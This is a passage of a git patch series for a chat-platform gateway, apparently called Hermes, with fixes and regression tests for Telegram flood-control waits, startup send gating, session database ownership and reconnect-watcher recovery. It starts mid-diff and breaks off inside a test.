getattr(_callback_tls, "approval", None) @@ -297,12 +310,7 @@ def set_approval_callback(cb): def _get_sudo_password_cache_scope() -> str: """Return the cache scope for interactive sudo passwords.""" - try: - from gateway.session_context import get_session_env - - session_key = get_session_env("HERMES_SESSION_KEY", "") - except Exception: - session_key = os.getenv("HERMES_SESSION_KEY", "") + session_key = _current_session_key() if session_key: return f"session:{session_key}" @@ -1398,12 +1406,7 @@ def _resolve_container_task_id(task_id: Optional[str]) -> str: # branches above: those paths already key containers per task_id, so they # stay authoritative where they apply and this only covers the cases that # would otherwise collapse to the shared "default" key (notably SSH). - try: - from gateway.session_context import get_session_env - - session_key = get_session_env("HERMES_SESSION_KEY", "") - except Exception: - session_key = os.getenv("HERMES_SESSION_KEY", "") + session_key = _current_session_key() if session_key: return f"session:{session_key}" return "default" From a444b673ad99a6f13f307e207086b074755bceea Mon Sep 17 00:00:00 2001 From: HexLab98 Date: Sat, 22 Aug 2026 08:35:57 +0700 Subject: [PATCH 140/161] fix(telegram): fail closed on long send-path flood waits Telegram RetryAfter on send() slept the server retry_after with no ceiling, so a 97-minute penalty pinned the coroutine. Mirror the edit path: waits over 5s return immediately; short waits still retry inline. --- plugins/platforms/telegram/adapter.py | 24 ++++++++++- .../gateway/test_telegram_send_path_health.py | 41 +++++++++++++++++++ 2 files changed, 63 insertions(+), 2 deletions(-) diff --git a/plugins/platforms/telegram/adapter.py b/plugins/platforms/telegram/adapter.py index 464ee389fc..a5433f5ed8 100644 --- a/plugins/platforms/telegram/adapter.py +++ b/plugins/platforms/telegram/adapter.py @@ -5441,9 +5441,29 @@ class TelegramAdapter(BasePlatformAdapter): except Exception as send_err: retry_after = getattr(send_err, "retry_after", None) if retry_after is not None or "retry after" in str(send_err).lower(): + wait = float(retry_after) if retry_after is not None else 1.0 + safe_send_error = _redact_telegram_error_text(send_err) + # Mirror the edit path: a RetryAfter past a few + # seconds is not something to hold this coroutine + # open for. Sleeping the server value verbatim + # pinned send() for 97 minutes in production and + # froze inbound on every platform when it ran on + # the gateway boot path (#91969). + if wait > 5.0: + logger.warning( + "[%s] Telegram flood control on send " + "(retry_after=%.1fs > 5s); failing closed " + "instead of sleeping: %s", + self.name, + wait, + safe_send_error, + ) + return SendResult( + success=False, + error=f"flood_control:{wait}", + retry_after=float(wait), + ) if _send_attempt < 2: - wait = float(retry_after) if retry_after is not None else 1.0 - safe_send_error = _redact_telegram_error_text(send_err) logger.warning( "[%s] Telegram flood control on send (attempt %d/3), retrying in %.1fs: %s", self.name, diff --git a/tests/gateway/test_telegram_send_path_health.py b/tests/gateway/test_telegram_send_path_health.py index f172021f62..a16faa4ecd 100644 --- a/tests/gateway/test_telegram_send_path_health.py +++ b/tests/gateway/test_telegram_send_path_health.py @@ -35,3 +35,44 @@ async def test_send_short_circuits_when_path_degraded(): adapter._bot.send_message.assert_not_awaited() +class _FloodError(Exception): + def __init__(self, seconds: float): + super().__init__(f"Flood control exceeded. Retry in {seconds} seconds") + self.retry_after = seconds + + +@pytest.mark.asyncio +async def test_send_long_flood_fails_closed_without_inline_sleep(monkeypatch): + """A 97-minute RetryAfter must not pin send() for the full penalty.""" + adapter = _make_adapter() + adapter._rich_send_disabled = True + adapter._bot.send_message = AsyncMock(side_effect=_FloodError(5827.0)) + sleep = AsyncMock() + monkeypatch.setattr("plugins.platforms.telegram.adapter.asyncio.sleep", sleep) + + result = await adapter.send("123", "hello") + + assert result.success is False + assert result.error == "flood_control:5827.0" + assert result.retry_after == 5827.0 + assert result.retryable is False + sleep.assert_not_awaited() + + +@pytest.mark.asyncio +async def test_send_short_flood_still_retries_inline(monkeypatch): + """Waits of a few seconds keep the existing inline retry.""" + adapter = _make_adapter() + adapter._rich_send_disabled = True + ok = MagicMock(message_id=7) + adapter._bot.send_message = AsyncMock(side_effect=[_FloodError(2.0), ok]) + sleep = AsyncMock() + monkeypatch.setattr("plugins.platforms.telegram.adapter.asyncio.sleep", sleep) + + result = await adapter.send("123", "hello") + + assert result.success is True + assert result.message_id == "7" + sleep.assert_awaited_once_with(2.0) + + From ce944a5a55621784a0ba9a9583c6dea804a05866 Mon Sep 17 00:00:00 2001 From: HexLab98 Date: Sat, 22 Aug 2026 08:40:30 +0700 Subject: [PATCH 141/161] fix(gateway): do not let boot-path sends hold the inbound gate Restart notification and obligation redelivery ran before the startup-restore gate opened, so one hung Telegram send queued inbound on every platform. Bound those sends with the same timeout the resume gate already uses, and clear resume_pending before send so a timed-out redelivery cannot also replay the turn. --- gateway/run.py | 124 ++++++++++++++----- tests/gateway/test_delivery_ledger.py | 38 ++++++ tests/gateway/test_restart_resume_pending.py | 82 ++++++++++++ 3 files changed, 212 insertions(+), 32 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index 9e9adaf5a5..8092f3f435 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -12004,6 +12004,69 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew exc_info=(type(exc), exc, exc.__traceback__), ) + async def _await_startup_boot_sends( + self, + *, + planned_restart_notification_pending: bool, + ) -> None: + """Run boot-path sends without letting them pin the inbound restore gate. + + ``_send_restart_notification`` and ``_redeliver_pending_obligations`` + used to be awaited inline *before* ``_finish_startup_restore`` + released the gate. A single Telegram flood-control sleep on either + send froze inbound on every platform for the full ``retry_after`` + (#91969). + + This uses the same bounded ``asyncio.wait`` the resume gate already + uses: on timeout we return and let the sends finish in the + background. Tasks are not cancelled. + """ + async def _boot_sends() -> None: + await self._send_restart_notification() + if planned_restart_notification_pending: + try: + await self._send_home_channel_startup_notifications( + skip_targets=None, + ) + finally: + _clear_planned_restart_notification() + await self._redeliver_pending_obligations() + + boot_task = asyncio.create_task(_boot_sends()) + timeout = _startup_restore_drain_timeout_secs() + if timeout > 0: + _done, pending = await asyncio.wait({boot_task}, timeout=timeout) + if pending: + logger.warning( + "Boot-path sends still running after %.0fs; releasing " + "inbound gate so other platforms are not frozen. " + "Restart notification / obligation redelivery continue " + "in the background.", + timeout, + ) + boot_task.add_done_callback(self._log_background_boot_send_result) + tasks = getattr(self, "_background_tasks", None) + if tasks is None: + self._background_tasks = set() + tasks = self._background_tasks + tasks.add(boot_task) + boot_task.add_done_callback(tasks.discard) + else: + await boot_task + + @staticmethod + def _log_background_boot_send_result(task: "asyncio.Task") -> None: + """Done-callback for boot-path sends that outlived the restore gate.""" + if task.cancelled(): + return + exc = task.exception() + if exc is not None: + logger.warning( + "background boot-path send failed after gate release: %s", + exc, + exc_info=(type(exc), exc, exc.__traceback__), + ) + async def _redeliver_pending_obligations(self) -> int: """Redeliver final responses recorded in the delivery ledger by a previous (now dead) gateway process. @@ -12067,6 +12130,22 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew metadata = ( {"thread_id": row["thread_id"]} if row.get("thread_id") else None ) + + # Clear resume_pending BEFORE the send. The answer is already in + # the ledger — a hung/flood-limited send must not also replay the + # turn when the inbound gate times out and schedules resume + # (#91969). Failed sends already skipped resume; this just does + # that bookkeeping first. + session_key = row.get("session_key") or "" + if session_key: + try: + await self.async_session_store.clear_resume_pending(session_key) + except Exception: + logger.debug( + "clear_resume_pending failed for %s", session_key, + exc_info=True, + ) + try: result = await adapter.send( chat_id=row["chat_id"], @@ -12097,18 +12176,6 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew ) except Exception: logger.debug("delivery ledger update failed", exc_info=True) - - # The answer reached (or was owed to) this session — don't ALSO - # re-run the turn via the resume path. - session_key = row.get("session_key") or "" - if session_key: - try: - await self.async_session_store.clear_resume_pending(session_key) - except Exception: - logger.debug( - "clear_resume_pending failed for %s", session_key, - exc_info=True, - ) return redelivered def _schedule_resume_pending_sessions(self, platform=None) -> int: @@ -13206,32 +13273,25 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew # of a restart cycle (see _is_stale_restart_redelivery). if chat_restart_notification_pending: self._booted_from_restart = True - await self._send_restart_notification() - - # Broadcast a lightweight "gateway is back" message to configured home - # channels only for non-chat planned restarts (terminal/SIGUSR1/service - # paths). Chat-originated /restart already has a precise reply target - # in .restart_notify.json, so keep that lifecycle in the originating - # chat/topic instead of also leaking it to the configured home channel. - if planned_restart_notification_pending: - try: - await self._send_home_channel_startup_notifications( - skip_targets=None, - ) - finally: - _clear_planned_restart_notification() + # Restart notification, home-channel startup notice, and obligation + # redelivery all call adapter.send(). Those sends must not pin the + # inbound restore gate — a Telegram flood-control sleep on this path + # froze every platform for the full penalty (#91969). Bound them the + # same way _finish_startup_restore bounds resume turns. + await self._await_startup_boot_sends( + planned_restart_notification_pending=planned_restart_notification_pending, + ) # Automatically continue fresh sessions that were interrupted by the # previous gateway restart/shutdown. The resume_pending flag is cleared # by the normal successful-turn path, so a failed auto-resume remains # visible for manual recovery on the next user message. # - # Delivery-obligation redelivery runs FIRST: a session whose final - # response was generated but never confirmed-delivered has its answer - # in the ledger — redelivering it (and clearing resume_pending for - # that session) is strictly cheaper and more correct than re-running - # the whole turn. - await self._redeliver_pending_obligations() + # Delivery-obligation redelivery already ran inside + # _await_startup_boot_sends (and clears resume_pending before send): + # a session whose final response was generated but never + # confirmed-delivered has its answer in the ledger — redelivering it + # is strictly cheaper and more correct than re-running the whole turn. self._schedule_resume_pending_sessions() await self._finish_startup_restore() diff --git a/tests/gateway/test_delivery_ledger.py b/tests/gateway/test_delivery_ledger.py index 10fb86867c..dd4bc52130 100644 --- a/tests/gateway/test_delivery_ledger.py +++ b/tests/gateway/test_delivery_ledger.py @@ -221,6 +221,44 @@ class TestGatewayRedeliverySweep: assert blocked_event_loop == [] + @pytest.mark.asyncio + async def test_clear_resume_pending_before_send_so_a_hang_cannot_also_resume( + self, + ): + """A hung redelivery send must still clear resume_pending. + + Otherwise a timed-out startup-restore gate would schedule resume and + replay a turn whose answer is already in the ledger (#91969). + """ + import asyncio + + _record() + _orphan("ob-1") + hang = asyncio.Event() + + async def hanging_send(**_kwargs): + await hang.wait() + return MagicMock(success=True, error="") + + adapter = MagicMock() + adapter.send = hanging_send + runner = self._runner(adapter) + task = asyncio.create_task(runner._redeliver_pending_obligations()) + + deadline = asyncio.get_running_loop().time() + 2 + while runner._async_session_store.clear_resume_pending.await_count == 0: + if asyncio.get_running_loop().time() >= deadline: + raise AssertionError("resume_pending was not cleared before send") + await asyncio.sleep(0) + + runner._async_session_store.clear_resume_pending.assert_awaited_once_with( + "agent:main:slack:channel:C1" + ) + assert not task.done() + + hang.set() + assert await task == 1 + class TestAttemptsOnlySpentOnRealSends: """``attempts`` is the redelivery budget — it must buy a send. diff --git a/tests/gateway/test_restart_resume_pending.py b/tests/gateway/test_restart_resume_pending.py index d52b8176d8..5c26e37c62 100644 --- a/tests/gateway/test_restart_resume_pending.py +++ b/tests/gateway/test_restart_resume_pending.py @@ -1077,3 +1077,85 @@ async def test_startup_restore_gate_releases_when_resume_turn_outlives_timeout( await slow_task +@pytest.mark.asyncio +async def test_startup_restore_gate_releases_when_boot_path_send_hangs( + monkeypatch, +): + """A hung restart notification / obligation redelivery must not freeze inbound. + + Those sends used to run *before* ``_finish_startup_restore`` released the + gate. A Telegram flood-control sleep on either call queued inbound on + every platform for the full ``retry_after``. + """ + monkeypatch.setenv("HERMES_STARTUP_RESTORE_DRAIN_TIMEOUT", "0.05") + + runner, adapter = make_restart_runner() + runner._startup_restore_in_progress = True + runner._startup_restore_queue = [] + runner._startup_restore_tasks = [] + runner._background_tasks = set() + + hung = asyncio.Event() + + async def never_returns(*_args, **_kwargs): + await hung.wait() + return None + + runner._send_restart_notification = never_returns + runner._redeliver_pending_obligations = AsyncMock(return_value=0) + + seen: list[str] = [] + + async def fake_handle_message(event: MessageEvent) -> None: + seen.append(f"inbound:{event.text}") + + adapter.handle_message = fake_handle_message + + inbound = MessageEvent( + text="hello", + message_type=MessageType.TEXT, + source=make_restart_source(chat_id="restore-chat"), + ) + assert await runner._handle_message(inbound) is None + assert runner._startup_restore_queue == [inbound] + + await asyncio.wait_for( + runner._await_startup_boot_sends( + planned_restart_notification_pending=False, + ), + timeout=5, + ) + await asyncio.wait_for(runner._finish_startup_restore(), timeout=5) + + assert seen == ["inbound:hello"], ( + "startup-restore gate never released: queued inbound was not drained " + "while a boot-path send was still sleeping" + ) + assert runner._startup_restore_queue == [] + assert runner._startup_restore_in_progress is False + runner._redeliver_pending_obligations.assert_not_awaited() + + hung.set() + leftover = [t for t in list(runner._background_tasks) if not t.done()] + if leftover: + await asyncio.wait(leftover) + + +@pytest.mark.asyncio +async def test_startup_boot_sends_still_run_when_they_finish_quickly(monkeypatch): + """The bound must not skip restart notification or redelivery on a fast path.""" + monkeypatch.setenv("HERMES_STARTUP_RESTORE_DRAIN_TIMEOUT", "2") + + runner, _adapter = make_restart_runner() + runner._background_tasks = set() + runner._send_restart_notification = AsyncMock(return_value=None) + runner._redeliver_pending_obligations = AsyncMock(return_value=0) + + await runner._await_startup_boot_sends( + planned_restart_notification_pending=False, + ) + + runner._send_restart_notification.assert_awaited_once() + runner._redeliver_pending_obligations.assert_awaited_once() + + From 41e29a601e8b3b1afd132967c607924d2963a4d2 Mon Sep 17 00:00:00 2001 From: Kshitij Kapoor Date: Sat, 22 Aug 2026 15:14:33 +0530 Subject: [PATCH 142/161] fix(gateway): clear resume_pending for all claimed ledger rows before any redelivery send MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow-up to the salvaged #91986: the per-row clear still left rows the loop had not reached exposed — a slow send ahead of them could hold the loop past the inbound-gate timeout and let _schedule_resume_pending_sessions replay those turns. Clearing every claimed row up front closes the duplicate window; claiming already spent the redelivery attempt, so the ledger retry path is unchanged. --- gateway/run.py | 34 +++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index 8092f3f435..7d3eadccff 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -12109,6 +12109,25 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew if not claimed: return 0 + # Clear resume_pending for EVERY claimed row up front, before any + # send. Claiming already spent one of the row's redelivery attempts — + # the answer is in the ledger, so the resume path must never re-run + # these turns. Doing this per-row as the loop reaches each send left + # a window: when a slow/flood-limited send held the loop past the + # inbound-gate timeout, _schedule_resume_pending_sessions could + # replay turns for rows the loop had not reached yet (#91969). + for row in claimed: + session_key = row.get("session_key") or "" + if not session_key: + continue + try: + await self.async_session_store.clear_resume_pending(session_key) + except Exception: + logger.debug( + "clear_resume_pending failed for %s", session_key, + exc_info=True, + ) + redelivered = 0 for row in claimed: try: @@ -12131,21 +12150,6 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew {"thread_id": row["thread_id"]} if row.get("thread_id") else None ) - # Clear resume_pending BEFORE the send. The answer is already in - # the ledger — a hung/flood-limited send must not also replay the - # turn when the inbound gate times out and schedules resume - # (#91969). Failed sends already skipped resume; this just does - # that bookkeeping first. - session_key = row.get("session_key") or "" - if session_key: - try: - await self.async_session_store.clear_resume_pending(session_key) - except Exception: - logger.debug( - "clear_resume_pending failed for %s", session_key, - exc_info=True, - ) - try: result = await adapter.send( chat_id=row["chat_id"], From bd2afde48f3487421c8e625d89fa0c118938a583 Mon Sep 17 00:00:00 2001 From: liuhao1024 Date: Fri, 21 Aug 2026 23:45:39 +0800 Subject: [PATCH 143/161] fix(tui): never transfer the shared launch SessionDB to one agent MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The eager session.resume path called _transfer_db_to_agent(agent, db) unconditionally. With no non-launch profile selected, db resolves to the SHARED launch handle (_get_db()), so the transfer succeeded on identity alone — the agent IS holding that handle — and session.close() then closed the process-wide database under every unrelated session: subsequent writes failed with "'NoneType' object has no attribute 'execute'" and the Desktop could not open chats until restart (#91610). This directly violated _transfer_db_to_agent's own contract ("Never called for the shared launch handle", introduced with the ownership lifecycle in #81071). Gate the transfer on owns_db (dedicated handles only), and add defense in depth: _transfer_db_to_agent now refuses db is _get_db() even when a caller invokes it incorrectly. --- .../test_session_db_ownership_teardown.py | 14 +++++++ .../test_session_resume_db_ownership.py | 39 +++++++++++++++++++ tui_gateway/methods_session.py | 9 ++++- tui_gateway/server.py | 8 ++++ 4 files changed, 69 insertions(+), 1 deletion(-) diff --git a/tests/tui_gateway/test_session_db_ownership_teardown.py b/tests/tui_gateway/test_session_db_ownership_teardown.py index 89b30bce37..e65f4be571 100644 --- a/tests/tui_gateway/test_session_db_ownership_teardown.py +++ b/tests/tui_gateway/test_session_db_ownership_teardown.py @@ -227,6 +227,20 @@ def test_transfer_is_refused_for_missing_operands(agent, db): assert server._transfer_db_to_agent(agent, db) is False +def test_transfer_is_refused_for_the_shared_launch_handle(monkeypatch): + """Defense in depth for #91610: identity alone passes for the SHARED + launch handle — a launch-profile agent IS holding it — so ownership + would make session.close() tear down the process-wide database under + every other session. The transfer must refuse it even when a caller + invokes the transfer incorrectly.""" + shared = _RecordingDB() + monkeypatch.setattr(server, "_get_db", lambda: shared) + agent = types.SimpleNamespace(_session_db=shared, _owns_session_db=False) + + assert server._transfer_db_to_agent(agent, shared) is False + assert agent._owns_session_db is False + + # --------------------------------------------------------------------------- # 3. The deferred builder — _start_agent_build # --------------------------------------------------------------------------- diff --git a/tests/tui_gateway/test_session_resume_db_ownership.py b/tests/tui_gateway/test_session_resume_db_ownership.py index 2d7a52f46f..47324e3de3 100644 --- a/tests/tui_gateway/test_session_resume_db_ownership.py +++ b/tests/tui_gateway/test_session_resume_db_ownership.py @@ -333,3 +333,42 @@ def test_resume_never_closes_shared_launch_db(profile_dbs, monkeypatch): assert resp["error"]["code"] == 4007 assert profile_dbs == [] # no dedicated handle was opened assert shared.closed == 0 + + +def test_resume_eager_never_transfers_shared_launch_db(profile_dbs, monkeypatch): + """Regression #91610: an eager resume in the LAUNCH profile resolves the + shared ``_get_db()`` handle and used to transfer ownership to the agent + unconditionally — session.close() then closed the process-wide database + under every unrelated session. The transfer must be gated on owns_db.""" + shared = _RecordingDB(db_path="launch") + shared.rows["s1"] = {"id": "s1", "cwd": ""} + monkeypatch.setattr(server, "_get_db", lambda: shared) + + def _fake_make_agent(sid, key, session_db=None, **_kwargs): + agent = types.SimpleNamespace(model="test") + agent._session_db = session_db # the agent IS holding the shared handle + agent._owns_session_db = False + return agent + + def _fake_init_session(sid, key, agent, history, session_db=None, **_kwargs): + with server._sessions_lock: + server._sessions[sid] = {"agent": agent, "session_key": key} + + monkeypatch.setattr(server, "_make_agent", _fake_make_agent) + monkeypatch.setattr(server, "_init_session", _fake_init_session) + monkeypatch.setattr(server, "_set_session_context", lambda _target: []) + monkeypatch.setattr(server, "_clear_session_context", lambda _tokens: None) + monkeypatch.setattr( + server, "_stored_session_runtime_overrides", lambda _found: {} + ) + monkeypatch.setattr(server, "_session_info", lambda agent, *a: {"model": "test"}) + + resp = _resume(session_id="s1", eager_build=True) + + assert resp["result"]["session_key"] == "s1" + agent = server._sessions.get(resp["result"]["session_id"], {}).get("agent") + assert agent is not None + # Ownership never transferred: closing this one session must not own the + # process-wide handle, and the shared handle stays open for others. + assert agent._owns_session_db is False + assert shared.closed == 0 diff --git a/tui_gateway/methods_session.py b/tui_gateway/methods_session.py index 91f6abb468..97ebfbb02e 100644 --- a/tui_gateway/methods_session.py +++ b/tui_gateway/methods_session.py @@ -861,7 +861,14 @@ def _(rid, params: dict) -> dict: # leaves the old leak, which is survivable; closing under a # live session is the permanent "Cannot operate on a closed # database" break this patch exists to avoid. - _transfer_db_to_agent(agent, db) + # + # The transfer itself is gated on owns_db: with no + # non-launch profile selected this path resolved db to the + # SHARED launch handle (_get_db()), and transferring it + # made session.close() tear down the process-wide + # database under every unrelated session (#91610). + if owns_db: + _transfer_db_to_agent(agent, db) owns_db = False finally: if init_home_token is not None: diff --git a/tui_gateway/server.py b/tui_gateway/server.py index 48d8039c53..04a2f52da4 100644 --- a/tui_gateway/server.py +++ b/tui_gateway/server.py @@ -1471,6 +1471,14 @@ def _transfer_db_to_agent(agent, db) -> bool: try: if getattr(agent, "_session_db", None) is not db: return False + # Defense in depth (#91610): the shared launch handle must never + # transfer. Identity alone passes for it — a launch-profile agent IS + # holding that handle — and ownership would make session.close() tear + # down the process-wide database every other session shares. Refuse it + # explicitly even if a caller invokes the transfer incorrectly; the + # caller's own `owns_db` gate is the first line of defense. + if db is _get_db(): + return False agent._owns_session_db = True return True except Exception: From 349d9aee4304c31fb4cd5acb0fdc2befc2f731ad Mon Sep 17 00:00:00 2001 From: liuhao1024 Date: Sat, 22 Aug 2026 04:08:53 +0800 Subject: [PATCH 144/161] fix(tui): log the refused shared-handle transfer and pin _get_db caching --- .../test_session_db_ownership_teardown.py | 13 +++++++++++++ tui_gateway/server.py | 4 ++++ 2 files changed, 17 insertions(+) diff --git a/tests/tui_gateway/test_session_db_ownership_teardown.py b/tests/tui_gateway/test_session_db_ownership_teardown.py index e65f4be571..766629a7a0 100644 --- a/tests/tui_gateway/test_session_db_ownership_teardown.py +++ b/tests/tui_gateway/test_session_db_ownership_teardown.py @@ -241,6 +241,19 @@ def test_transfer_is_refused_for_the_shared_launch_handle(monkeypatch): assert agent._owns_session_db is False +def test_get_db_returns_the_cached_instance(monkeypatch): + """The identity defense (``db is _get_db()``) only works while _get_db + hands out ONE process-wide instance. Pin the caching semantics: once a + handle exists, repeated calls return the same object rather than + constructing per-call wrappers (review finding on #91631).""" + sentinel = types.SimpleNamespace(closed=0) + monkeypatch.setattr(server, "_db", sentinel) + monkeypatch.setattr(server, "_db_error", None) + + assert server._get_db() is sentinel + assert server._get_db() is server._get_db() + + # --------------------------------------------------------------------------- # 3. The deferred builder — _start_agent_build # --------------------------------------------------------------------------- diff --git a/tui_gateway/server.py b/tui_gateway/server.py index 04a2f52da4..4fb51eeec4 100644 --- a/tui_gateway/server.py +++ b/tui_gateway/server.py @@ -1478,6 +1478,10 @@ def _transfer_db_to_agent(agent, db) -> bool: # explicitly even if a caller invokes the transfer incorrectly; the # caller's own `owns_db` gate is the first line of defense. if db is _get_db(): + logger.warning( + "Refused transfer of the shared launch SessionDB to a session " + "agent — the caller's owns_db gate should have prevented this." + ) return False agent._owns_session_db = True return True From 92018e76a8cde141ab89d9f0e6e63502d9ae9610 Mon Sep 17 00:00:00 2001 From: Jack Lau <72348727+jackulau@users.noreply.github.com> Date: Wed, 19 Aug 2026 21:45:34 -0500 Subject: [PATCH 145/161] fix(gateway): heal a dead reconnect watcher when the platform is already queued _ensure_reconnect_watcher_running() exists for one situation: the reconnect watcher has exhausted _MAX_SUPERVISED_RESTARTS, so _spawn_supervised has logged "giving up restarts" and will never bring it back on its own (#70344, and the supervised-restart half of #71758). It had exactly one call site, inside the newly-queued branch of _queue_retryable_fatal_platform. That branch is unreachable for a platform already in _failed_platforms, which is the only kind of platform the watcher can have been retrying long enough to burn five rapid restarts on. So the backstop could not fire in the one state it was written for. The failure is silent by construction. The early return logs nothing, so there is no "queued for background reconnection" line. The stranded check in _handle_adapter_fatal_error_detached deliberately treats a queued platform as safe, so the gateway does not exit for the service manager either. With another platform still connected, self.adapters is non-empty and the "gateway staying alive, watcher will retry in background" branch is skipped too. A retryable fatal error can therefore produce a single ERROR line and then nothing: the platform sits in the queue that nobody is draining until someone restarts the process by hand (#90386 reports 4h17m of that, with cron unaffected throughout). Call the ensure on the already-queued path as well. It is already idempotent and already cheap: it returns immediately unless the tracked task is done, and it routes through the same on_spawn handle tracking, so a live watcher is never duplicated. The queue entry itself is deliberately left untouched. Re-enqueueing would reset attempts and next_retry, restarting the backoff ladder on every fatal error and hammering a provider that is already refusing the connection. --- gateway/run.py | 29 ++++- tests/gateway/test_platform_reconnect.py | 145 +++++++++++++++++++++++ 2 files changed, 171 insertions(+), 3 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index 7d3eadccff..00cfd13dab 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -8339,7 +8339,27 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew if not adapter.fatal_error_retryable: return False platform_config = self.config.platforms.get(adapter.platform) - if not platform_config or adapter.platform in self._failed_platforms: + if not platform_config: + return False + if adapter.platform in self._failed_platforms: + # Nothing to enqueue -- but "already queued" is precisely the state + # in which the watcher has had time to die, and the enqueue branch + # below holds the ONLY call to _ensure_reconnect_watcher_running(). + # + # _spawn_supervised auto-restarts the watcher after a crash (#71758), + # but only _MAX_SUPERVISED_RESTARTS times in rapid succession; past + # that it logs "giving up restarts" and the watcher stays dead + # forever. _ensure_reconnect_watcher_running is the documented + # backstop for exactly that budget exhaustion (#70344) -- and it was + # unreachable for a platform already in the queue, which is the only + # kind of platform the watcher can have been retrying long enough to + # exhaust it on. + # + # The result is a silent permanent outage: nothing retries, and the + # stranded check in _handle_adapter_fatal_error_detached deliberately + # treats a queued platform as safe, so the process never restarts + # either (#90386). + self._ensure_reconnect_watcher_running() return False self._failed_platforms[adapter.platform] = { "config": platform_config, @@ -14254,8 +14274,11 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew If the tracked reconnect watcher task has died (e.g. from exhausting its restart budget, or a terminal exception that _spawn_supervised could not recover), respawns it so platforms queued for reconnection - are not permanently stranded. Called after queueing a retryable fatal - error in _handle_adapter_fatal_error (#70344). + are not permanently stranded. Called from + _queue_retryable_fatal_platform on BOTH paths (#70344, #90386): after a + new enqueue, and after a re-fatal for a platform that is already queued + -- the latter being the only case in which the watcher can have been + retrying long enough to exhaust its supervised restart budget. """ if not getattr(self, "_running", False): return diff --git a/tests/gateway/test_platform_reconnect.py b/tests/gateway/test_platform_reconnect.py index b8c5f50b79..bf00b570f2 100644 --- a/tests/gateway/test_platform_reconnect.py +++ b/tests/gateway/test_platform_reconnect.py @@ -853,3 +853,148 @@ class TestVoiceInputCallbackWiring: "startup must wire _voice_input_callback" ) + + +class TestRequeueHealsDeadReconnectWatcher: + """Regression for #90386: a second retryable fatal error for a platform that + is ALREADY queued must still check that the reconnect watcher is alive. + + ``_ensure_reconnect_watcher_running()`` is the documented backstop for the + watcher exhausting ``_MAX_SUPERVISED_RESTARTS`` (#70344) -- ``_spawn_supervised`` + stops respawning after that and logs "giving up restarts". Its only call site + sat behind the newly-queued branch of ``_queue_retryable_fatal_platform``, + so it could never fire for a platform already in ``_failed_platforms`` -- + which is the only kind of platform the watcher can have been retrying long + enough to exhaust the budget on. + + The observable result is a silent permanent outage: the queue holds the + platform, nothing retries it, and the stranded check in + ``_handle_adapter_fatal_error_detached`` deliberately treats a queued + platform as safe, so the process is never restarted either. + """ + + @staticmethod + def _runner_with_dead_watcher(spawned): + runner = _make_runner() + runner._running = True + runner._background_tasks = set() + + def _fake_spawn(coro_factory, name, **kwargs): + spawned.append(name) + handle = MagicMock() + handle.done.return_value = False + on_spawn = kwargs.get("on_spawn") + if on_spawn is not None: + on_spawn(handle) + return handle + + runner._spawn_supervised = _fake_spawn + return runner + + @staticmethod + def _already_queued(runner, *, attempts=7): + runner._failed_platforms[Platform.TELEGRAM] = { + "config": runner.config.platforms[Platform.TELEGRAM], + "attempts": attempts, + "next_retry": time.monotonic() + 300, + "queued_at": time.monotonic() - 3600, + "credential_claim": None, + "listener_claim": None, + } + + @staticmethod + def _fatal_adapter(): + adapter = StubAdapter() + adapter._set_fatal_error( + "telegram_network_error", + "Telegram polling could not reconnect after 10 network error retries.", + retryable=True, + ) + return adapter + + @pytest.mark.asyncio + async def test_requeue_respawns_a_watcher_that_gave_up_restarting(self): + """The core #90386 regression. + + Telegram is queued and the watcher has exhausted its restart budget, so + the task is done and ``_spawn_supervised`` will never bring it back on + its own. A fresh retryable fatal error arrives for that same platform. + Nothing is enqueued (it is already there), but the watcher MUST be + respawned -- otherwise the queue entry is retried by nobody, forever. + """ + spawned: list[str] = [] + runner = self._runner_with_dead_watcher(spawned) + self._already_queued(runner) + + async def _died(): + return None + + dead = asyncio.create_task(_died()) + await dead + runner._reconnect_watcher_task = dead + + queued = runner._queue_retryable_fatal_platform(self._fatal_adapter()) + + assert queued is False, "already-queued platform must not be re-enqueued" + assert spawned == ["platform_reconnect_watcher"], ( + "a re-fatal on an already-queued platform must still heal a dead " + "reconnect watcher -- it is the only remaining path back to the " + "queue once _spawn_supervised has given up restarting (#90386)" + ) + assert not runner._reconnect_watcher_task.done(), ( + "the tracked handle must point at the newly spawned watcher" + ) + + @pytest.mark.asyncio + async def test_requeue_does_not_disturb_the_existing_queue_entry(self): + """Guardrail on the fix: healing the watcher must not become a re-enqueue. + + Overwriting the entry would reset ``attempts`` and ``next_retry``, so a + platform that fails repeatedly would restart its backoff ladder on every + fatal error and hammer a provider that is already refusing it. + """ + spawned: list[str] = [] + runner = self._runner_with_dead_watcher(spawned) + self._already_queued(runner, attempts=7) + before = dict(runner._failed_platforms[Platform.TELEGRAM]) + + async def _died(): + return None + + dead = asyncio.create_task(_died()) + await dead + runner._reconnect_watcher_task = dead + + assert runner._queue_retryable_fatal_platform(self._fatal_adapter()) is False + assert runner._failed_platforms[Platform.TELEGRAM] == before, ( + "the existing queue entry, including its attempt count and backoff " + "deadline, must survive the watcher heal untouched" + ) + + @pytest.mark.asyncio + async def test_requeue_with_a_live_watcher_spawns_nothing(self): + """Guardrail on the fix: a live watcher must not be duplicated. + + Two concurrent watchers would double every reconnect attempt, which is + the failure ``_spawn_supervised``'s ``on_spawn`` handle-tracking exists + to prevent. + """ + spawned: list[str] = [] + runner = self._runner_with_dead_watcher(spawned) + self._already_queued(runner) + + async def _alive(): + await asyncio.sleep(5) + + live = 